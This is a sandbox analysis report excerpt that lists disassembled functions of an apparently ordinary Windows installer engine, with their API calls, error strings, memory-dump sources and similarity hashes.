CompareStringW.KERNEL32(00000000,00000001,00000000,000000FF,?,000000FF,00000000,00000000,00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4), ref: 007E8BF7
RegCloseKey.ADVAPI32(00000000,-80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,00000000,00000100,00000100,000001B4,?,?,?,007CF66B,00000001,00000100,000001B4,00000000), ref: 007E8C45

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 007E8B94
Failed to enumerate uninstall key for related bundles., xrefs: 007E8C56
Failed to open uninstall registry key., xrefs: 007E8BBA

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseCompareOpenString
String ID: Failed to enumerate uninstall key for related bundles.$Failed to open uninstall registry key.$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
API String ID: 2817536665-2531018330
Opcode ID: 07958c8389f69ad7a6d39851b351ad608f362b3f88b9637c3a6c3d3b473542cb
Instruction ID: c93867c18b0f0570458e37fc33d5b77c9633dd35c52d27aa2b016f4711fb81fa
Opcode Fuzzy Hash: 07958c8389f69ad7a6d39851b351ad608f362b3f88b9637c3a6c3d3b473542cb
Instruction Fuzzy Hash: BA21E772902158FFDB515B95CC45FEEBB79FF09321F2442A4F814B61A0CB790E90D6A1

Function 00803F04 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CopyFileW.KERNEL32(00000000,007C4CB6,00000000,?,?,00000000,?,00804012,00000000,007C4CB6,00000000,00000000,?,007D83E2,?,?), ref: 00803F1E
GetLastError.KERNEL32(?,00804012,00000000,007C4CB6,00000000,00000000,?,007D83E2,?,?,00000001,00000003,000007D0,?,?,?), ref: 00803F2C
CopyFileW.KERNEL32(00000000,007C4CB6,00000000,007C4CB6,00000000,?,00804012,00000000,007C4CB6,00000000,00000000,?,007D83E2,?,?,00000001), ref: 00803F92
GetLastError.KERNEL32(?,00804012,00000000,007C4CB6,00000000,00000000,?,007D83E2,?,?,00000001,00000003,000007D0,?,?,?), ref: 00803F9C

Strings

fileutil.cpp, xrefs: 00803FBA

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CopyErrorFileLast
String ID: fileutil.cpp
API String ID: 374144340-2967768451
Opcode ID: 25fb1714c0911c5334e86d7a6b4a6fc08c59eee97a5fc6dbf936303191c45fb7
Instruction ID: 851513fdb1a52b79f5c2bc651f4e5dc02afb2135b579d8ebb787a29ab4323cb3
Opcode Fuzzy Hash: 25fb1714c0911c5334e86d7a6b4a6fc08c59eee97a5fc6dbf936303191c45fb7
Instruction Fuzzy Hash: 6D21D836E446379BEB601E654C44B7B76BDFF40BA0B16402AFD05EB190EF24CE0192E1

Function 008031C7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 84memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008031DD
SysAllocString.OLEAUT32(?), ref: 008031F9
VariantClear.OLEAUT32(?), ref: 00803280
SysFreeString.OLEAUT32(00000000), ref: 0080328B

Strings

xmlutil.cpp, xrefs: 00803210

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: xmlutil.cpp
API String ID: 760788290-1270936966
Opcode ID: 15db7d6b9949fd916442b2fba279e831b713bdf267d7c847910a67df7925043c
Instruction ID: 09a6d0e4b501bede2dcddd4389e31338597c0e2f2957c1111154ddd8460a3230
Opcode Fuzzy Hash: 15db7d6b9949fd916442b2fba279e831b713bdf267d7c847910a67df7925043c
Instruction Fuzzy Hash: CE219135901229EFCB50DBA8CC48EAEBBBDFF44712F154158F905EB260DB319E018B90

Function 007ED047 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 80synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

WaitForSingleObject.KERNEL32(?,000000FF), ref: 007ED0DC
ReleaseMutex.KERNEL32(?), ref: 007ED10A
SetEvent.KERNEL32(?), ref: 007ED113

Strings

Failed to allocate buffer., xrefs: 007ED08B
NetFxChainer.cpp, xrefs: 007ED081

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateEventMutexObjectProcessReleaseSingleWait
String ID: Failed to allocate buffer.$NetFxChainer.cpp
API String ID: 944053411-3611226795
Opcode ID: 2c9d077860e1d3239617645793279a2d786da993b301fc816bfbc29251b578bc
Instruction ID: 89f1a6195d776f1f3109c68482aede0654155d5fc92d32d19738520d41795a00
Opcode Fuzzy Hash: 2c9d077860e1d3239617645793279a2d786da993b301fc816bfbc29251b578bc
Instruction Fuzzy Hash: 2D219FB4A0034ABFDB109F68D848A99B7F5FF48314F148629F924A7252C779AD518B50

Function 008057BF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

QueryServiceConfigW.ADVAPI32(00000000,00000000,00000000,?,00000001,00000000,?,?,007E68CE,00000000,?), ref: 008057D5
GetLastError.KERNEL32(?,?,007E68CE,00000000,?,?,?,?,?,?,?,?,?,007E6CE1,?,?), ref: 008057E3

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

QueryServiceConfigW.ADVAPI32(00000000,00000000,?,?,?,00000001,?,?,007E68CE,00000000,?), ref: 0080581D
GetLastError.KERNEL32(?,?,007E68CE,00000000,?,?,?,?,?,?,?,?,?,007E6CE1,?,?), ref: 00805827

Strings

svcutil.cpp, xrefs: 00805806, 00805848

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ConfigErrorHeapLastQueryService$AllocateProcess
String ID: svcutil.cpp
API String ID: 355237494-1746323212
Opcode ID: 29a4e8f68c4ab576453511d00ebd78f9310980549ce08d693609ccdf997f504a
Instruction ID: 792b0a1aefc06353ea4d931f33962754bb6c8de437a03110e516dfd9eb5ac7c5
Opcode Fuzzy Hash: 29a4e8f68c4ab576453511d00ebd78f9310980549ce08d693609ccdf997f504a
Instruction Fuzzy Hash: 5621D836A40628FBE7605A564D04FAB7A9CFF44B90F118129FD04E7150E665CD009AF0

Function 007C96F4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

_memcpy_s.LIBCMT ref: 007C9783

Strings

condition.cpp, xrefs: 007C9725, 007C9766
Failed to read next symbol., xrefs: 007C979F
Failed to find variable., xrefs: 007C9770
Failed to parse condition '%ls' at position: %u, xrefs: 007C9735

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: _memcpy_s
String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
API String ID: 2001391462-1605196437
Opcode ID: e2e3b15d3d6c30b0bc671ac941fc91a68fac3fcf8605adc713972d766d277515
Instruction ID: 108c94636037e8f6ccf1c35390c3f04cad7709f5d57efbac997dd73c1d96e280
Opcode Fuzzy Hash: e2e3b15d3d6c30b0bc671ac941fc91a68fac3fcf8605adc713972d766d277515
Instruction Fuzzy Hash: C111EB33291320B7DB952DA8DC8EF973B14EB05B20F04406DFE049D6D2DA6EC91096D1

Function 007C9D03 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON

Download Yara Rule

APIs

_MREFOpen@16.MSPDB140-MSVCRT ref: 007C9D25

Strings

Failed get file version., xrefs: 007C9D65
Failed to set variable., xrefs: 007C9D84
File search: %ls, did not find path: %ls, xrefs: 007C9D90
Failed to format path string., xrefs: 007C9D30

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Open@16
String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
API String ID: 3613110473-2458530209
Opcode ID: e7888a9e08ad3f481da8f51be1ece640db6008068b204de226fd032f936ff24d
Instruction ID: 5b7ad9c52fc38c75e8814a3b3a4b5cb6b91896a767fd8d0d6970b8dae249fbb2
Opcode Fuzzy Hash: e7888a9e08ad3f481da8f51be1ece640db6008068b204de226fd032f936ff24d
Instruction Fuzzy Hash: E111A232E0022DBACB526E948C85EAEBB79EB00310F14456DFA15B6251D6395E20ABD1

Function 007D4880 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,007D51A4), ref: 007D48CC

Strings

pipe.cpp, xrefs: 007D4904
Failed to allocate message to write., xrefs: 007D48AB
Failed to write message type to pipe., xrefs: 007D490E

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: FileWrite
String ID: Failed to allocate message to write.$Failed to write message type to pipe.$pipe.cpp
API String ID: 3934441357-1996674626
Opcode ID: 6c589509a4b1500816e3e2bffc5a1dbaae111c587e53a28af5a7ad417bd66df9
Instruction ID: efc543e29b7e7fcddefca0491f217896528219346397e7698e934fc0fc61ae34
Opcode Fuzzy Hash: 6c589509a4b1500816e3e2bffc5a1dbaae111c587e53a28af5a7ad417bd66df9
Instruction Fuzzy Hash: 49119A72A00218BFEB119F95DD09EDF7BB9EF40350F114126F804A2250D774AE50EAA1

Function 007D8003 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 007C38D4: GetProcessHeap.KERNEL32(?,000001C7,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38E5
Part of subcall function 007C38D4: RtlAllocateHeap.NTDLL(00000000,?,007C2284,000001C7,00000001,80004005,8007139F,?,?,0080015F,8007139F,?,00000000,00000000,8007139F), ref: 007C38EC

CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,007D8C10,0000001A,00000000,?,00000000,00000000), ref: 007D804C
GetLastError.KERNEL32(?,?,007D8C10,0000001A,00000000,?,00000000,00000000,?,?,00000000,00000000,?,?,-00000004,00000000), ref: 007D8056

Strings

Failed to create well known SID., xrefs: 007D8084
Failed to allocate memory for well known SID., xrefs: 007D8034
cache.cpp, xrefs: 007D802A, 007D807A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: Heap$AllocateCreateErrorKnownLastProcessWell
String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
API String ID: 2186923214-2110050797
Opcode ID: 4c4e9a976a5998ba4b8780f2d2ae9177b99a13a30831f9e650178bb40591e01c
Instruction ID: 11a80c959afbc3784860ccb9616689bc28ec06cd65831fc20b56ce38143b61d6
Opcode Fuzzy Hash: 4c4e9a976a5998ba4b8780f2d2ae9177b99a13a30831f9e650178bb40591e01c
Instruction Fuzzy Hash: B1010872640724BAE76067695C0AF9B6BADEF41B60F11401FFD14EB380EE6D8E4186F1

Function 007EDB67 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 64windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 007EDB95
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007EDBBF
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,007EDD8F,00000000,?,?,?,00000001,00000000), ref: 007EDBC7

Strings

bitsuser.cpp, xrefs: 007EDBEB
Failed while waiting for download., xrefs: 007EDBF5

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastMessageMultipleObjectsPeekWait
String ID: Failed while waiting for download.$bitsuser.cpp
API String ID: 435350009-228655868
Opcode ID: 320d61a379b64a0b9babdca1ef9085dc98bf495253a32049e83b96ad38855f89
Instruction ID: b8ac8c9748b53c37b07226615c570084d693e7c0d67d046fd6df5d004296a85c
Opcode Fuzzy Hash: 320d61a379b64a0b9babdca1ef9085dc98bf495253a32049e83b96ad38855f89
Instruction Fuzzy Hash: B5110C73B413257BE7205AA99C49EDBBBACFB09760F114129FD04E72D0D6699D0085E4

Function 00803B4A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 60COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 00803B98
GetLastError.KERNEL32(?,?,00000000), ref: 00803BA2
CloseHandle.KERNEL32(?,?,?,00000000), ref: 00803BD5

Strings

shelutil.cpp, xrefs: 00803BC3
<, xrefs: 00803B8A

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CloseErrorExecuteHandleLastShell
String ID: <$shelutil.cpp
API String ID: 3023784893-3991740012
Opcode ID: 04b2fb64cb1c28b41ce2132966bc76510dc06ecf6c8fd38c0bec40b80772b5a6
Instruction ID: 5ab8c263a36b0deff8528932641c9e94887a8662124cb6159616ca00b9c861b9
Opcode Fuzzy Hash: 04b2fb64cb1c28b41ce2132966bc76510dc06ecf6c8fd38c0bec40b80772b5a6
Instruction Fuzzy Hash: 5D11E7B5E01218AFDB50DFA9D844A8EBBF8FF08354F00412AFD15E7350E7349A108BA4

Function 007C5E0B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 58COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000010), ref: 007C5E39
GetLastError.KERNEL32 ref: 007C5E43

Strings

Failed to set variant value., xrefs: 007C5E8A
Failed to get computer name., xrefs: 007C5E71
variable.cpp, xrefs: 007C5E67

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ComputerErrorLastName
String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
API String ID: 3560734967-484636765
Opcode ID: c903b8851817f9f0a75f46d720db0d1cc85d36680541bbeb25139ddfcd0b2bf1
Instruction ID: c262d70bf518c5f4246b99db1d01c7044503053f378d6d7d521baa74e4f773a6
Opcode Fuzzy Hash: c903b8851817f9f0a75f46d720db0d1cc85d36680541bbeb25139ddfcd0b2bf1
Instruction Fuzzy Hash: CF01A932A41628ABD710DBA99C45FEF77E8FB08710F01411AFD05FB280DA79AE4586E5

Function 007C5D71 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 007C5D83

Part of subcall function 008009BB: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,007C5D8F,00000000), ref: 008009CF
Part of subcall function 008009BB: GetProcAddress.KERNEL32(00000000), ref: 008009D6
Part of subcall function 008009BB: GetLastError.KERNEL32(?,?,?,007C5D8F,00000000), ref: 008009ED

Part of subcall function 00803BF7: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00803C24

Strings

Failed to get 64-bit folder., xrefs: 007C5DCD
Failed to set variant value., xrefs: 007C5DE7
variable.cpp, xrefs: 007C5DAD
Failed to get shell folder., xrefs: 007C5DB7

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
API String ID: 2084161155-3906113122
Opcode ID: 0fe9a613dc0ac9db9b11f0bb42ec9f2594e1f79d808862eaf296d191d2ab281b
Instruction ID: 3fa95c0bd8c81524624c5cad162d88d79893661c7c35b4456298b700dacb1d42
Opcode Fuzzy Hash: 0fe9a613dc0ac9db9b11f0bb42ec9f2594e1f79d808862eaf296d191d2ab281b
Instruction Fuzzy Hash: 7901A531A40728B7DF21AB94CC4AF9E7B68EB00721F10415DF801F6191DBB9AE8097D1

Function 00800917 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,007C4E16,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00800927
GetLastError.KERNEL32(?,?,007C4E16,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00800935

Strings

procutil.cpp, xrefs: 00800959

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: procutil.cpp
API String ID: 1211598281-1178289305
Opcode ID: dd489d8562f8ef3c940872fdad81ecb4d37c5b562aa0ca400ace343f73479e59
Instruction ID: 66a5d0ac505e1b968eca9bdd98c321ac0fed36891a83ec92ce71a1c548b77020
Opcode Fuzzy Hash: dd489d8562f8ef3c940872fdad81ecb4d37c5b562aa0ca400ace343f73479e59
Instruction Fuzzy Hash: 3511A532E00725EBFB509BA58D0879B7ED4FF04360F114215FD15E7291D3348D509AE5

Function 00804038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00804315: FindFirstFileW.KERNEL32(007E8FFA,?,000002C0,00000000,00000000), ref: 00804350
Part of subcall function 00804315: FindClose.KERNEL32(00000000), ref: 0080435C

SetFileAttributesW.KERNEL32(007E8FFA,00000080,00000000,007E8FFA,000000FF,00000000,?,?,007E8FFA), ref: 00804067
GetLastError.KERNEL32(?,?,007E8FFA), ref: 00804071
DeleteFileW.KERNEL32(007E8FFA,00000000,007E8FFA,000000FF,00000000,?,?,007E8FFA), ref: 00804090
GetLastError.KERNEL32(?,?,007E8FFA), ref: 0080409A

Strings

fileutil.cpp, xrefs: 008040B4

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
String ID: fileutil.cpp
API String ID: 3967264933-2967768451
Opcode ID: 38d7b429bfcc6dc67cd39ce8bf6113e72149033df977efd96790f11fbade2fa7
Instruction ID: 147ac968352da9c63a16ca9dd3e657e75776adf4ee6de886039236f04940542a
Opcode Fuzzy Hash: 38d7b429bfcc6dc67cd39ce8bf6113e72149033df977efd96790f11fbade2fa7
Instruction Fuzzy Hash: 85019271A81B35A7D7A15BA98D08B9B7AD8FF00760F014315FE05F61E0D7218D0099E5

Function 007ED7CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 007ED7E1
LeaveCriticalSection.KERNEL32(?), ref: 007ED826
SetEvent.KERNEL32(?,?,?,?), ref: 007ED83A

Strings

Failure while sending progress during BITS job modification., xrefs: 007ED815
Failed to get state during job modification., xrefs: 007ED7FA

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993404087.000000000080B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993642804.000000000082A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3993827893.000000000082E000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7c0000_UNK_.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
API String ID: 3094578987-1258544340
Opcode ID: 25b6104686a691d6e7eb9af71e2eea741e35706f7284ad932b009e00a2c518b2
Instruction ID: 0634f2f88fe61d74ea9edb5014eb87defbc8a1353bfe65cc6d4e1ec645cd09e3
Opcode Fuzzy Hash: 25b6104686a691d6e7eb9af71e2eea741e35706f7284ad932b009e00a2c518b2
Instruction Fuzzy Hash: B2019E72A02625BFCB219B56D849EAAB7ACFF08330B004229E804D7640D738FD549BD4

Function 007EDA45 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,007EDBB5), ref: 007EDA59
LeaveCriticalSection.KERNEL32(00000008,?,007EDBB5), ref: 007EDA9E
SetEvent.KERNEL32(?,?,007EDBB5), ref: 007EDAB2

Strings

Failure while sending progress., xrefs: 007EDA8D
Failed to get BITS job state., xrefs: 007EDA72

Memory Dump Source

Source File: 00000002.00000002.3993068921.00000000007C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 007C0000, based on PE: true

Associated: 00000002.00000002.3992894641.00000000007C0000.00000002.00000001.01000000.00000005.sdmpDownload File
